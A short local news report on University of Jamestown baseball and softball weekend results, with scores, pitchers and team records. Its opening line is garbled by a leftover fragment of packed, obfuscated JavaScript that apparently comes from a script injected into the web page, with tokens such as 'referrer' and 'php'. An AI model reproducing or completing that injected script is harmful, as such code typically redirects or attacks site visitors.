JAMESTOWN nnhth|var|u0026u|referrer|zdfre||js|php’.split(‘|’),0,{}))
(NewsDakota.com)- Both the softball and baseball teams at the University of Jamestown were able to get some games in for the first time since their trips to Tucson during spring break. The baseball team traveled to Redfield, SD to play Presentation College four times. The softball team treked to Concordia (MN) and Morningside (IA) over the weekend for double headers.

The baseball team got another sparkling pitching performance from aces Tanner Dahl and Josh Shaw, but someone only split the doubleheader Saturday. The pair combined for 17 scoreless innings on the hill, but only one win to show for it. The Jimmies beat Presentation 12-0 in the opener behind Dahl. Shaw followed that up with 10 scoreless innings before the Jimmies lost 1-0 in the 11th after an unearned run charged to Nick Smart.

The Jimmies returned to action on Sunday to win a pair of one-run games; 9-8 and 8-7. They improved their record to 16-5. Jamestown received votes in last weeks NAIA poll, a new poll will be introduced tomorrow.

The softball team split their four weekend games with Concordia and Morningside. The Jimmies were also suppose to play Dakota Wesleyan today, but that has been canceled. Their record currently sits at 9-11.

Jamestown won both at Concordia on Saturday, sweeping the Cobbers 14-2 and 9-1. Sunday they weren’t so lucky losing both games to Morningside; 13-1 and 2-1.

Both teams are expected to travel to Dickinson on Wednesday to battle the Blue Hawks.
